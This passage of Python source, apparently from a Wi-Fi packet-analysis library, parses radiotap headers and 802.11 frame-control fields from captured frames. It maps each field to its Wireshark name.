('chan.ofdm', ctypes.c_bool),
('chan.two_g', ctypes.c_bool),
('chan.five_g', ctypes.c_bool),
('chan.passive', ctypes.c_bool),
('chan.dynamic', ctypes.c_bool),
('chan.gfsk', ctypes.c_bool),
('chan.gsm', ctypes.c_bool),
('chan.static_turbo', ctypes.c_bool),
('chan.half_rate', ctypes.c_bool),
('chan.quarter_rate', ctypes.c_bool),
('fhss.hopset', ctypes.c_int),
('fhss.pattern', ctypes.c_uint),
('dbm_antsignal', ctypes.c_uint),
('dbm_antnoise', ctypes.c_uint),
('lock_quality', ctypes.c_uint),
('tx_attenuation', ctypes.c_uint),
('db_tx_attenuation', ctypes.c_uint),
('dbm_tx_power', ctypes.c_uint),
('antenna', ctypes.c_uint),
('db_antsignal', ctypes.c_uint),
('db_antnoise', ctypes.c_uint),
('rxflags.reserved', ctypes.c_bool),
('rxflags.badplcp', ctypes.c_bool),
('txflags', ctypes.c_uint),
('rts_retries', ctypes.c_uint),
('data_retries', ctypes.c_uint),
('xchannel.freq', ctypes.c_uint),
('xchannel.channel', ctypes.c_uint),
('xchannel.max_power', ctypes.c_uint),
('xchannel.flags.turbo', ctypes.c_bool),
('xchannel.flags.cck', ctypes.c_bool),
('xchannel.flags.ofdm', ctypes.c_bool),
('xchannel.flags.two_g', ctypes.c_bool),
('xchannel.flags.five_g', ctypes.c_bool),
('xchannel.flags.passive', ctypes.c_bool),
('xchannel.flags.dynamic', ctypes.c_bool),
('xchannel.flags.gfsk', ctypes.c_bool),
('xchannel.flags.gsm', ctypes.c_bool),
('xchannel.flags.sturbo', ctypes.c_bool),
('xchannel.flags.half', ctypes.c_bool),
('xchannel.flags.quarter', ctypes.c_bool),
('xchannel.flags.ht_20', ctypes.c_bool),
('xchannel.flags.ht_40u', ctypes.c_bool),
('xchannel.flags.ht_40d', ctypes.c_bool),
('mcs.known', ctypes.c_uint8),
('mcs.index', ctypes.c_uint8),
('mcs.have_bw', ctypes.c_bool),
('mcs.have_mcs', ctypes.c_bool),
('mcs.have_gi', ctypes.c_bool),
('mcs.have_format', ctypes.c_bool),
('mcs.have_fec', ctypes.c_bool),
('mcs.have_stbc', ctypes.c_bool),
('mcs.have_ness', ctypes.c_bool),
('mcs.ness_bit1', ctypes.c_bool),
('ampdu.refnum', ctypes.c_uint),
('ampdu.crc_val', ctypes.c_uint8),
('ampdu.reserved', ctypes.c_uint8),
('ampdu.flags.report_zerolen', ctypes.c_bool),
('ampdu.flags.is_zerolen', ctypes.c_bool),
('ampdu.flags.lastknown', ctypes.c_bool),
('ampdu.flags.last', ctypes.c_bool),
('ampdu.flags.delim_crc_error', ctypes.c_bool),
('vht.known_bits', ctypes.c_char_p),
('vht.have_stbc', ctypes.c_bool),
('vht.have_txop_ps', ctypes.c_bool),
('vht.have_gi', ctypes.c_bool),
('vht.have_sgi_nsym_da', ctypes.c_bool),
('vht.have_ldpc_extra', ctypes.c_bool),
('vht.have_beamformed', ctypes.c_bool),
('vht.have_bw', ctypes.c_bool),
('vht.have_gid', ctypes.c_bool),
('vht.have_paid', ctypes.c_bool),
('vht.flag_bits', ctypes.c_bool),
('vht.stbc', ctypes.c_bool),
('vht.txop_ps', ctypes.c_bool),
('vht.gi', ctypes.c_bool),
('vht.sgi_nysm_da', ctypes.c_bool),
('vht.ldpc_extra', ctypes.c_bool),
('vht.beamformed', ctypes.c_bool),
('vht.group_id', ctypes.c_bool),
('vht.partial_id', ctypes.c_bool),
('vht.bw', ctypes.c_uint),
('vht.user_0.nss', ctypes.c_bool),
('vht.user_0.mcs', ctypes.c_bool),
('vht.user_0.coding', ctypes.c_bool),
('vht.user_1.nss', ctypes.c_bool),
('vht.user_1.mcs', ctypes.c_bool),
('vht.user_1.coding', ctypes.c_bool),
('vht.user_2.nss', ctypes.c_bool),
('vht.user_2.mcs', ctypes.c_bool),
('vht.user_2.coding', ctypes.c_bool),
('vht.user_3.nss', ctypes.c_bool),
('vht.user_3.mcs', ctypes.c_bool),
('vht.user_3.coding', ctypes.c_bool),
('prot_type', ctypes.c_char_p)]
# Wireshark syntax conjugates of fields in object
_r_shark_ = {'radiotap.version': 'vers',
'radiotap.pad': 'pad',
'radiotap.length': 'len',
'radiotap.present.tsft': 'present.tsft',
'radiotap.present.flags': 'present.flags',
'radiotap.present.rate': 'present.rate',
'radiotap.present.channel': 'present.channel',
'radiotap.present.fhss': 'present.fhss',
'radiotap.present.dbm_antsignal': 'present.dbm_antsignal',
'radiotap.present.dbm_antnoise': 'present.dbm_antnoise',
'radiotap.present.lock_quality': 'present.lock_quality',
'radiotap.present.tx_attenuation': 'present.tx_attenuation',
'radiotap.present.db_tx_attenuation': 'present.db_tx_attenuation',
'radiotap.present.dbm_tx_power': 'present.dbm_tx_power',
'radiotap.present.antenna': 'present.antenna',
'radiotap.present.db_antsignal': 'present.db_antsignal',
'radiotap.present.db_antnoise': 'present.db_antnoise',
'radiotap.present.rxflags': 'present.rxflags',
'radiotap.present.xchannel': 'present.xchannel',
'radiotap.present.mcs': 'present.mcs',
'radiotap.present.ampdu': 'present.ampdu',
'radiotap.present.vht': 'present.vht',
'radiotap.present.rtap_ns': 'present.rtap_ns',
'radiotap.present.vendor_ns': 'present.ven_ns',
'radiotap.present.ext': 'present.ext',
'radiotap.mactime': 'mactime',
'radiotap.flags.cfp': 'flags.cfp',
'radiotap.flags.preamble': 'flags.preamble',
'radiotap.flags.wep': 'flags.wep',
'radiotap.flags.frag': 'flags.fragmentation',
'radiotap.flags.fcs': 'flags.fcs',
'radiotap.flags.datapad': 'flags.datapad',
'radiotap.flags.badfcs': 'flags.badfcs',
'radiotap.flags.shortgi': 'flags.shortgi',
'radiotap.datarate': 'rate',
'radiotap.channel.freq': 'chan.freq',
'radiotap.channel.flags.turbo': 'chan.turbo',
'radiotap.channel.flags.cck': 'chan.cck',
'radiotap.channel.flags.ofdm': 'chan.ofdm',
'radiotap.channel.flags.2ghz': 'chan.two_g',
'radiotap.channel.flags.5ghz': 'chan.five_g',
'radiotap.channel.flags.passive': 'chan.passive',
'radiotap.channel.flags.dynamic': 'chan.dynamic',
'radiotap.channel.flags.gfsk': 'chan.gfsk',
'radiotap.channel.flags.gsm': 'chan.gsm',
'radiotap.channel.flags.sturbo': 'chan.static_turbo',
'radiotap.channel.flags.half': 'chan.half_rate',
'radiotap.channel.flags.quarter': 'chan.quarter_rate',
'radiotap.fhss.hopset': 'fhss.hopset',
'radiotap.fhss.pattern': 'fhss.pattern',
'radiotap.dbm_antsignal': 'dbm_antsignal',
'radiotap.dbm_antnoise': 'dbm_antnoise',
'radiotap.antenna': 'antenna',
'radiotap.db_antsignal': 'db_antsignal',
'radiotap.db_antnoise': 'db_antnoise',
'radiotap.rxflags.badplcp': 'rxflags.badplcp',
'radiotap.xchannel.freq': 'xchannel.freq',
'radiotap.xchannel.channel': 'xchannel.channel',
'radiotap.xchannel.flags.turbo': 'xchannel.flags.turbo',
'radiotap.xchannel.flags.cck': 'xchannel.flags.cck',
'radiotap.xchannel.flags.ofdm': 'xchannel.flags.ofdm',
'radiotap.xchannel.flags.2ghz': 'xchannel.flags.two_g',
'radiotap.xchannel.flags.5ghz': 'xchannel.flags.five_g',
'radiotap.xchannel.flags.passive': 'xchannel.flags.passive',
'radiotap.xchannel.flags.dynamic': 'xchannel.flags.dynamic',
'radiotap.xchannel.flags.gfsk': 'xchannel.flags.gfsk',
'radiotap.xchannel.flags.gsm': 'xchannel.flags.gsm',
'radiotap.xchannel.flags.sturbo': 'xchannel.flags.sturbo',
'radiotap.xchannel.flags.half': 'xchannel.flags.half',
'radiotap.xchannel.flags.quarter': 'xchannel.flags.quarter',
'radiotap.xchannel.flags.ht20': 'xchannel.flags.ht_20',
'radiotap.xchannel.flags.ht40u': 'xchannel.flags.ht_40u',
'radiotap.xchannel.flags.ht40d': 'xchannel.flags.ht_40d',
'radiotap.mcs.known': 'mcs.known',
'radiotap.mcs.index': 'mcs.index',
'radiotap.mcs.have_bw': 'mcs.have_bw',
'radiotap.mcs.have_gi': 'mcs.have_gi',
'radiotap.mcs.have_format': 'mcs.have_format',
'radiotap.mcs.have_fec': 'mcs.have_fec',
'radiotap.mcs.have_stbc': 'mcs.have_stbc',
'radiotap.mcs.have_ness': 'mcs.have_ness',
'radiotap.mcs.ness_bit1': 'mcs.ness_bit1',
'radiotap.ampdu.reference': 'ampdu.refnum',
'radiotap.ampdu.crc_val': 'ampdu.crc_val',
'radiotap.ampdu.reserved': 'ampdu.reserved',
'radiotap.ampdu.flags.report_zerolen': 'ampdu.flags.report_zerolen',
'radiotap.ampdu.flags.is_zerolen': 'ampdu.flags.is_zerolen',
'radiotap.ampdu.flags.lastknown': 'ampdu.flags.lastknown',
'radiotap.ampdu.flags.last': 'ampdu.flags.last',
'radiotap.ampdu.flags.delim_crc_error': 'ampdu.flags.delim_crc_error',
'radiotap.vht.have_stbc': 'vht.have_stbc',
'radiotap.vht.have_txop_ps': 'vht.have_txop_ps',
'radiotap.vht.have_gi': 'vht.have_gi',
'radiotap.vht.have_sgi_nsym_da': 'vht.have_sgi_nsym_da',
'radiotap.vht.have_ldpc_extra': 'vht.have_ldpc_extra', # this does not seem with have_ prefix in wireshark
'radiotap.vht.have_beamformed': 'vht.have_beamformed', # creates conflict with ldpc_extra below; we keep radiotap
'radiotap.vht.have_bw': 'vht.have_bw', # syntax.
'radiotap.vht.have_gid': 'vht.have_gid',
'radiotap.vht.have_paid': 'vht.have_paid',
'radiotap.vht.stbc': 'vht.stbc',
'radiotap.vht.txop_ps': 'vht.txop_ps',
'radiotap.vht.gi': 'vht.gi',
'radiotap.vht.sgi_nysm_da': 'vht.sgi_nysm_da',
'radiotap.vht.ldpc_extra': 'vht.ldpc_extra',
'radiotap.vht.beamformed': 'vht.beamformed',
'radiotap.vht.gid': 'vht.group_id',
'radiotap.vht.paid': 'vht.partial_id',
'radiotap.vht.bw': 'vht.bw',
'radiotap.vht.nss.0': 'vht.user_0.nss',
'radiotap.vht.mcs.0': 'vht.user_0.mcs',
'radiotap.vht.coding.0': 'vht.user_0.coding',
'radiotap.vht.nss.1': 'vht.user_1.nss',
'radiotap.vht.mcs.1': 'vht.user_1.mcs',
'radiotap.vht.coding.1': 'vht.user_1.coding',
'radiotap.vht.nss.2': 'vht.user_2.nss',
'radiotap.vht.mcs.2': 'vht.user_2.mcs',
'radiotap.vht.coding.2': 'vht.user_2.coding',
'radiotap.vht.nss.3': 'vht.user_3.nss',
'radiotap.vht.mcs.3': 'vht.user_3.mcs',
'radiotap.vht.coding.3': 'vht.user_3.coding'}
def __init__(self, rtap_bytes):
"""Constructor method.
:rtap_bytes: ctypes.Structure
"""
super(Radiotap, self).__init__()
self._raw = {} # contains raw bytes, for debugging purposes
self._bits = {} # contains bitstrings, for debugging purposes
idx = 0
self._rtap = rtap_bytes
# parse radiotap headers
self.vers = Radiotap.strip_vers(self._rtap[idx:idx + 1])
idx += 1
self.pad = Radiotap.strip_pad(self._rtap[idx:idx + 1])
idx += 1
self.len = Radiotap.strip_len(self._rtap[idx:idx + 2])
idx += 2
self.present, self.present_bits = Radiotap.strip_present(self._rtap[idx:idx + 4])
idx += 4
# parse radiotap payload
if self.present.tsft: # 8 byte
idx, self.mactime = self.strip_tsft(idx)
if self.present.flags: # 1 byte
idx, self.flags = self.strip_flags(idx)
if self.present.rate: # 1 byte
idx, self.rate = self.strip_rate(idx)
if self.present.channel: # 2 byte (align 2 byte)
idx, self.chan = self.strip_chan(idx)
if self.present.fhss: # 2 byte
idx, self.fhss = self.strip_fhss(idx)
if self.present.dbm_antsignal: # 1 byte
idx, self.dbm_antsignal = self.strip_dbm_antsignal(idx)
if self.present.dbm_antnoise: # 1 byte
idx, self.dbm_antnoise = self.strip_dbm_antnoise(idx)
if self.present.lock_quality: # 2 byte (align 2 byte)
idx, self.lock_quality = self.strip_lock_quality(idx)
if self.present.tx_attenuation: # 1 byte (align 2 byte)
idx, self.tx_attenuation = self.strip_tx_attenuation(idx)
if self.present.db_tx_attenuation: # 1 byte (align 2 byte)
idx, self.db_tx_attenuation = self.strip_db_tx_attenuation(idx)
if self.present.dbm_tx_power: # 1 byte (align 1 byte)
idx, self.dbm_tx_power = self.strip_dbm_tx_power(idx)
if self.present.antenna: # 1 byte
idx, self.antenna = self.strip_antenna(idx)
if self.present.db_antsignal: # 1 byte
idx, self.db_antsignal = self.strip_db_antsignal(idx)
if self.present.db_antnoise: # 1 byte
idx, self.db_antnoise = self.strip_db_antnoise(idx)
if self.present.rxflags: # 2 byte (align 2 byte)
idx, self.rxflags = self.strip_rx_flags(idx)
if self.present.txflags: # 1 byte (align 2 byte)
idx, self.txflags = self.strip_tx_flags(idx)
if self.present.rts_retries: # 1 byte
idx, self.rts_retries = self.strip_rts_retries(idx)
if self.present.data_retries: # 1 byte
idx, self.data_retries = self.strip_data_retries(idx)
if self.present.xchannel: # 7 byte (align 2 byte)
idx, self.xchannel = self.strip_xchannel(idx)
if self.present.mcs: # 3 byte (align 1 byte)
idx, self.mcs = self.strip_mcs(idx)
if self.present.ampdu: # 8 byte (align 4 byte)
idx, self.ampdu = self.strip_ampdu(idx)
if self.present.vht: # 12 byte (align 2 byte)
idx, self.vht = self.strip_vht(idx)
self.prot_type = self.extract_protocol()
@staticmethod
def strip_vers(payload):
"""strip(1 byte) radiotap.version
:payload: ctypes.Structure
:return: int
"""
return struct.unpack('B', payload)[0]
@staticmethod
def strip_pad(payload):
"""strip(1 byte) radiotap.pad
:payload: ctypes.Structure
:return: int
"""
return struct.unpack('B', payload)[0]
@staticmethod
def strip_len(payload):
"""strip(2 byte) radiotap.length
:payload: ctypes.Structure
:return: int
"""
return struct.unpack('H', payload)[0]
@staticmethod
def strip_present(payload):
"""strip(4 byte) radiotap.present. Those are flags that
identify existence of incoming radiotap meta-data.
:idx: int
:return: str
:return: namedtuple
"""
present = collections.namedtuple(
'present', ['tsft', 'flags', 'rate', 'channel', 'fhss',
'dbm_antsignal', 'dbm_antnoise', 'lock_quality',
'tx_attenuation', 'db_tx_attenuation', 'dbm_tx_power',
'antenna', 'db_antsignal', 'db_antnoise', 'rxflags',
'txflags', 'rts_retries', 'data_retries', 'xchannel',
'mcs', 'ampdu', 'vht', 'rtap_ns', 'ven_ns', 'ext'])
val = struct.unpack('<L', payload)[0]
bits = format(val, '032b')[::-1]
present.tsft = int(bits[0]) # timer synchronization function
present.flags = int(bits[1]) # flags
present.rate = int(bits[2]) # rate
present.channel = int(bits[3]) # channel
present.fhss = int(bits[4]) # frequency hoping spread spectrum
present.dbm_antsignal = int(bits[5]) # dbm antenna signal
present.dbm_antnoise = int(bits[6]) # dbm antenna noinse
present.lock_quality = int(bits[7]) # quality of barker code lock
present.tx_attenuation = int(bits[8]) # transmitter attenuation
present.db_tx_attenuation = int(bits[9]) # decibel transmit attenuation
present.dbm_tx_power = int(bits[10]) # dbm transmit power
present.antenna = int(bits[11]) # antenna
present.db_antsignal = int(bits[12]) # db antenna signal
present.db_antnoise = int(bits[13]) # db antenna noise
present.rxflags = int(bits[14]) # receiver flags
present.txflags = int(bits[15]) # transmitter flags
present.rts_retries = int(bits[16]) # rts(request to send) retries
present.data_retries = int(bits[17]) # data retries
present.xchannel = int(bits[18]) # xchannel
present.mcs = int(bits[19]) # modulation and coding scheme
present.ampdu = int(bits[20]) # aggregated mac protocol data unit
present.vht = int(bits[21]) # very high throughput
present.rtap_ns = int(bits[29]) # radiotap namespace
present.ven_ns = int(bits[30]) # vendor namespace
present.ext = int(bits[31]) # extension
return present, bits
def strip_tsft(self, idx):
"""strip(8 byte) radiotap.mactime
:idx: int
:return: int
idx
:return: int
mactime
"""
idx = Radiotap.align(idx, 8)
mactime, = struct.unpack_from('<Q', self._rtap, idx)
return idx + 8, mactime
def strip_flags(self, idx):
"""strip(1 byte) radiotap.flags
:idx: int
:return: int
idx
:return: collections.namedtuple
"""
flags = collections.namedtuple(
'flags', ['cfp', 'preamble', 'wep', 'fragmentation', 'fcs',
'datapad', 'badfcs', 'shortgi'])
val, = struct.unpack_from('<B', self._rtap, idx)
bits = format(val, '08b')[::-1]
flags.cfp = int(bits[0])
flags.preamble = int(bits[1])
flags.wep = int(bits[2])
flags.fragmentation = int(bits[3])
flags.fcs = int(bits[4])
flags.datapad = int(bits[5])
flags.badfcs = int(bits[6])
flags.shortgi = int(bits[7])
return idx + 1, flags
def strip_rate(self, idx):
"""strip(1 byte) radiotap.datarate
note that, unit of this field is originally 0.5 Mbps
:idx: int
:return: int
idx
:return: double
rate in terms of Mbps
"""
val, = struct.unpack_from('<B', self._rtap, idx)
rate_unit = float(1) / 2 # Mbps
return idx + 1, rate_unit * val
def strip_chan(self, idx):
"""strip(2 byte) radiotap.channel.flags
:idx: int
:return: int
idx
:return: collections.namedtuple
"""
chan = collections.namedtuple(
'chan', ['freq', 'turbo', 'cck', 'ofdm', 'two_g', 'five_g',
'passive', 'dynamic', 'gfsk', 'gsm', 'static_turbo',
'half_rate', 'quarter_rate'])
idx = Radiotap.align(idx, 2)
freq, flags, = struct.unpack_from('<HH', self._rtap, idx)
chan.freq = freq
bits = format(flags, '016b')[::-1]
chan.turbo = int(bits[4])
chan.cck = int(bits[5])
chan.ofdm = int(bits[6])
chan.two_g = int(bits[7])
chan.five_g = int(bits[8])
chan.passive = int(bits[9])
chan.dynamic = int(bits[10])
chan.gfsk = int(bits[11])
chan.gsm = int(bits[12])
chan.static_turbo = int(bits[13])
chan.half_rate = int(bits[14])
chan.quarter_rate = int(bits[15])
return idx + 4, chan
def strip_fhss(self, idx):
"""strip (2 byte) radiotap.fhss.hopset(1 byte) and
radiotap.fhss.pattern(1 byte)
:idx: int
:return: int
idx
:return: collections.namedtuple
"""
fhss = collections.namedtuple('fhss', ['hopset', 'pattern'])
fhss.hopset, fhss.pattern, = struct.unpack_from('<bb', self._rtap, idx)
return idx + 2, fhss
def strip_dbm_antsignal(self, idx):
"""strip(1 byte) radiotap.dbm.ant_signal
:idx: int
:return: int
idx
:return: int
"""
dbm_antsignal, = struct.unpack_from('<b', self._rtap, idx)
return idx + 1, dbm_antsignal
def strip_dbm_antnoise(self, idx):
"""strip(1 byte) radiotap.dbm_antnoise
:idx: int
:return: int
idx
:return: int
"""
dbm_antnoise, = struct.unpack_from('<b', self._rtap, idx)
return idx + 1, dbm_antnoise
def strip_lock_quality(self, idx):
"""strip(2 byte) lock quality
:idx: int
:return: int
idx
:return: int
"""
idx = Radiotap.align(idx, 2)
lock_quality, = struct.unpack_from('<H', self._rtap, idx)
return idx + 2, lock_quality
def strip_tx_attenuation(self, idx):
"""strip(1 byte) tx_attenuation
:idx: int
:return: int
idx
:return: int
"""
idx = Radiotap.align(idx, 2)
tx_attenuation, = struct.unpack_from('<H', self._rtap, idx)
return idx + 2, tx_attenuation
def strip_db_tx_attenuation(self, idx):
"""strip(1 byte) db_tx_attenuation
:return: int
idx
:return: int
"""
idx = Radiotap.align(idx, 2)
db_tx_attenuation, = struct.unpack_from('<H', self._rtap, idx)
return idx + 2, db_tx_attenuation
def strip_dbm_tx_power(self, idx):
"""strip(1 byte) dbm_tx_power
:return: int
idx
:return: int
"""
idx = Radiotap.align(idx, 1)
dbm_tx_power, = struct.unpack_from('<b', self._rtap, idx)
return idx + 1, dbm_tx_power
def strip_antenna(self, idx):
"""strip(1 byte) radiotap.antenna
:return: int
idx
:return: int
"""
antenna, = struct.unpack_from('<B', self._rtap, idx)
return idx + 1, antenna
def strip_db_antsignal(self, idx):
"""strip(1 byte) radiotap.db_antsignal
:return: int
idx
:return: int
"""
db_antsignal, = struct.unpack_from('<B', self._rtap, idx)
return idx + 1, db_antsignal
def strip_db_antnoise(self, idx):
"""strip(1 byte) radiotap.db_antnoise
:return: int
idx
:return: int
"""
db_antnoise, = struct.unpack_from('<B', self._rtap, idx)
return idx + 1, db_antnoise
def strip_rx_flags(self, idx):
"""strip(2 byte) radiotap.rxflags
:idx: int
:return: int
idx
:return: collections.namedtuple
"""
rx_flags = collections.namedtuple('rx_flags', ['reserved', 'badplcp'])
idx = Radiotap.align(idx, 2)
flags, = struct.unpack_from('<H', self._rtap, idx)
flag_bits = format(flags, '08b')[::-1]
rx_flags.reserved = int(flag_bits[0])
rx_flags.badplcp = int(flag_bits[1])
return idx + 2, rx_flags
def strip_tx_flags(self, idx):
"""strip(1 byte) tx_flags
:idx: int
:return: int
idx
:return: int
"""
idx = Radiotap.align(idx, 2)
tx_flags, = struct.unpack_from('<B', self._rtap, idx)
return idx + 1, tx_flags
def strip_rts_retries(self, idx):
"""strip(1 byte) rts_retries
:idx: int
:return: int
idx
:return: int
"""
rts_retries, = struct.unpack_from('<B', self._rtap, idx)
return idx + 1, rts_retries
def strip_data_retries(self, idx):
"""strip(1 byte) data_retries
:idx: int
:return: int
idx
:return: int
"""
data_retries, = struct.unpack_from('<B', self._rtap, idx)
return idx + 1, data_retries
def strip_xchannel(self, idx):
"""strip(7 bytes) radiotap.xchannel.channel(1 byte),
radiotap.xchannel.freq(2 bytes) and radiotap.xchannel.flags(4 bytes)
:idx: int
:return: int
idx
:return: collections.namedtuple
"""
xchannel = collections.namedtuple(
'xchannel', ['flags', 'freq', 'channel', 'max_power'])
flags = collections.namedtuple(
'flags', ['turbo', 'cck', 'ofdm', 'two_g', 'five_g', 'passive',
'dynamic', 'gfsk', 'gsm', 'sturbo', 'hafl', 'quarter',
'ht_20', 'ht_40u', 'ht_40d'])
idx = Radiotap.align(idx, 2)
flag_val, freq, channel, max_power = struct.unpack_from('<lHBB', self._rtap, idx)
xchannel.freq = freq
xchannel.channel = channel
xchannel.max_power = max_power
bits = format(flag_val, '032b')[::-1]
flags.turbo = int(bits[4])
flags.cck = int(bits[5])
flags.ofdm = int(bits[6])
flags.two_g = int(bits[7])
flags.five_g = int(bits[8])
flags.passive = int(bits[9])
flags.dynamic = int(bits[10])
flags.gfsk = int(bits[11])
flags.gsm = int(bits[12])
flags.sturbo = int(bits[13])
flags.half = int(bits[14])
flags.quarter = int(bits[15])
flags.ht_20 = int(bits[16])
flags.ht_40u = int(bits[17])
flags.ht_40d = int(bits[18])
xchannel.flags = flags
return idx + 8, xchannel
def strip_mcs(self, idx):
"""strip(3 byte) radiotap.mcs which contains 802.11n bandwidth,
mcs(modulation and coding scheme) and stbc(space time block coding)
information.
:idx: int
:return: int
idx
:return: collections.namedtuple
"""
mcs = collections.namedtuple(
'mcs', ['known', 'index', 'have_bw', 'have_mcs', 'have_gi',
'have_format', 'have_fec', 'have_stbc', 'have_ness',
'ness_bit1'])
idx = Radiotap.align(idx, 1)
known, flags, index = struct.unpack_from('<BBB', self._rtap, idx)
bits = format(flags, '032b')[::-1]
mcs.known = known # Known MCS information
mcs.index = index # MCS index
mcs.have_bw = int(bits[0]) # Bandwidth
mcs.have_mcs = int(bits[1]) # MCS
mcs.have_gi = int(bits[2]) # Guard Interval
mcs.have_format = int(bits[3]) # Format
mcs.have_fec = int(bits[4]) # FEC(Forward Error Correction) type
mcs.have_stbc = int(bits[5]) # Space Time Block Coding
mcs.have_ness = int(bits[6]) # Number of Extension Spatial Streams
mcs.ness_bit1 = int(bits[7]) # Number of Extension Spatial Streams bit 1
return idx + 3, mcs
def strip_ampdu(self, idx):
"""strip(8 byte) radiotap.ampdu
:idx: int
:return: int
idx
:return: collections.namedtuple
"""
ampdu = collections.namedtuple(
'ampdu', ['reference', 'crc_val', 'reservered', 'flags'])
flags = collections.namedtuple(
'flags', ['report_zerolen', 'is_zerolen', 'lastknown', 'last',
'delim_crc_error'])
idx = Radiotap.align(idx, 4)
refnum, flag_vals, crc_val, reserved = struct.unpack_from('<LHBB', self._rtap, idx)
ampdu.flags = flags
ampdu.reference = refnum
ampdu.crc_val = crc_val
ampdu.reserved = reserved
bits = format(flag_vals, '032b')[::-1]
ampdu.flags.report_zerolen = int(bits[0])
ampdu.flags.is_zerolen = int(bits[1])
ampdu.flags.lastknown = int(bits[2])
ampdu.flags.last = int(bits[3])
ampdu.flags.delim_crc_error = int(bits[4])
return idx + 8, ampdu
def strip_vht(self, idx):
"""strip(12 byte) radiotap.vht
:idx: int
:return: int
idx
:return: collections.namedtuple
"""
vht = collections.namedtuple(
'vht', ['known_bits', 'have_stbc', 'have_txop_ps', 'have_gi',
'have_sgi_nsym_da', 'have_ldpc_extra', 'have_beamformed',
'have_bw', 'have_gid', 'have_paid', 'stbc', 'txop_ps', 'gi',
'sgi_nysm_da', 'ldpc_extra', 'group_id', 'partial_id',
'beamformed', 'user_0', 'user_1', 'user_2', 'user_3'])
user = collections.namedtuple('user', ['nss', 'mcs', 'coding'])
idx = Radiotap.align(idx, 2)
known, flags, bw = struct.unpack_from('<HBB', self._rtap, idx)
mcs_nss_0, mcs_nss_1, mcs_nss_2, mcs_nss_3 = struct.unpack_from('<BBBB', self._rtap, idx + 4)
coding, group_id, partial_id = struct.unpack_from('<BBH', self._rtap, idx + 8)
known_bits = format(known, '032b')[::-1]
vht.known_bits = known_bits
vht.have_stbc = int(known_bits[0]) # Space Time Block Coding
vht.have_txop_ps = int(known_bits[1]) # TXOP_PS_NOT_ALLOWD
vht.have_gi = int(known_bits[2]) # Short/Long Guard Interval
vht.have_sgi_nsym_da = int(known_bits[3]) # Short Guard Interval Nsym Disambiguation
vht.have_ldpc_extra = int(known_bits[4]) # LDPC(Low Density Parity Check)
vht.have_beamformed = int(known_bits[5]) # Beamformed
vht.have_bw = int(known_bits[6]) # Bandwidth
vht.have_gid = int(known_bits[7]) # Group ID
vht.have_paid = int(known_bits[8]) # Partial AID
flag_bits = format(flags, '032b')[::-1]
vht.flag_bits = flag_bits
vht.stbc = int(flag_bits[0])
vht.txop_ps = int(flag_bits[1])
vht.gi = int(flag_bits[2])
vht.sgi_nysm_da = int(flag_bits[3])
vht.ldpc_extra = int(flag_bits[4])
vht.beamformed = int(flag_bits[5])
vht.group_id = group_id
vht.partial_id = partial_id
vht.bw = bw
vht.user_0 = user(None, None, None)
vht.user_1 = user(None, None, None)
vht.user_2 = user(None, None, None)
vht.user_3 = user(None, None, None)
for (i, mcs_nss) in enumerate([mcs_nss_0, mcs_nss_1, mcs_nss_2, mcs_nss_3]):
if mcs_nss:
nss = mcs_nss & 0xf0 >> 4
mcs = (mcs_nss & 0xf0) >> 4
coding = (coding & 2**i) >> i
if i == 0:
vht.user_0 = user(nss, mcs, coding)
elif i == 1:
vht.user_1 = user(nss, mcs, coding)
elif i == 2:
vht.user_2 = user(nss, mcs, coding)
elif i == 3:
vht.user_3 = user(nss, mcs, coding)
return idx + 12, vht
def extract_protocol(self):
"""extract 802.11 protocol from radiotap.channel.flags
:return: str
protocol name
one of below in success
[.11a, .11b, .11g, .11n, .11ac]
None in fail
"""
if self.present.mcs:
return '.11n'
if self.present.vht:
return '.11ac'
if self.present.channel and hasattr(self, 'chan'):
if self.chan.five_g:
if self.chan.ofdm:
return '.11a'
elif self.chan.two_g:
if self.chan.cck:
return '.11b'
elif self.chan.ofdm or self.chan.dynamic:
return '.11g'
return 'None'
@staticmethod
def align(val, align):
"""
:val: int
:align: int
:return: int
"""
return (val + align - 1) & ~(align - 1)
class Wifi(ctypes.Structure):
"""Base Wi-Fi Packet"""
_fields_ = [('name', ctypes.c_char_p), # name of packet
('vers', ctypes.c_ushort), # version
('category', ctypes.c_ushort), # category
('subtype', ctypes.c_ushort), # subtype
('ds', ctypes.c_char_p), # distribution system
('to_ds', ctypes.c_bool), # to distribution system -> wlan.fc.ds[0]
('from_ds', ctypes.c_bool), # from distribution system -> wlan.fc.ds[1]
('frag', ctypes.c_bool), # more flag
('retry', ctypes.c_bool), # retry
('power_mgmt', ctypes.c_bool), # power management
('order', ctypes.c_bool), # order
('wep', ctypes.c_bool), # wired equivalent privacy
('duration', ctypes.c_uint)] # duration
# Wireshark syntax conjugates of fields in object (base)
_shark_ = {'wlan.fc.version': 'vers',
'wlan.fc.type': 'category',
'wlan.fc.type_subtype': 'subtype',
'wlan.fc.ds': 'ds',
'wlan.fc.frag': 'frag',
'wlan.fc.retry': 'retry',
'wlan.fc.pwrmgt': 'power_mgmt',
'wlan.fc.wep': 'wep',
'wlan.fc.order': 'order',
'wlan.duration': 'duration'}
def __init__(self, frame, no_rtap=False):
"""Constructor method.
Parse common headers of all Wi-Fi frames.
:frame: ctypes.Structure
"""
super(Wifi, self).__init__()
self._raw = {}
if not no_rtap:
rtap_bytes, self._packet = WiHelper._strip_rtap(frame)
self.radiotap = Radiotap(rtap_bytes)
else:
self._packet = frame
self.radiotap = None
f_cntrl = struct.unpack('BB', self._packet[:2]) # frame control
flags = f_cntrl[1]
self.vers = f_cntrl[0] & 0b0011
self.category = (f_cntrl[0] >> 2) & 0b0011
self.subtype = f_cntrl[0] >> 4
flag_bits = format(flags, '08b')[::-1]
self.to_ds = int(flag_bits[0])
self.from_ds = int(flag_bits[1])
self.ds = b''.join([(flag_bits[0]).encode('ascii'),
(flag_bits[1]).encode('ascii')])
self.frag = int(flag_bits[2])
self.retry = int(flag_bits[3])
self.power_mgmt = int(flag_bits[4])
self.more_data = int(flag_bits[5])
self.wep = int(flag_bits[6])
self.order = int(flag_bits[7])
# TODO: parse duration with respect to field/subfield
# since some bits might be reserved for types like data (0x20)
# https://community.arubanetworks.com/t5/Technology-Blog/802-11-Duration-ID-Field/ba-p/235872
self.duration = struct.unpack('H', self._packet[2:4])[0] # us
self.name = None
if self.category == 0:
if self.subtype in _SUBTYPES_[0].keys():
self.name = _SUBTYPES_[0][self.subtype].encode('ascii')
elif self.category == 1:
if self.subtype in _SUBTYPES_[1].keys():
self.name = _SUBTYPES_[1][self.subtype].encode('ascii')
elif self.category == 2:
if self.subtype in _SUBTYPES_[2].keys():
self.name = _SUBTYPES_[2][self.subtype].encode('ascii')
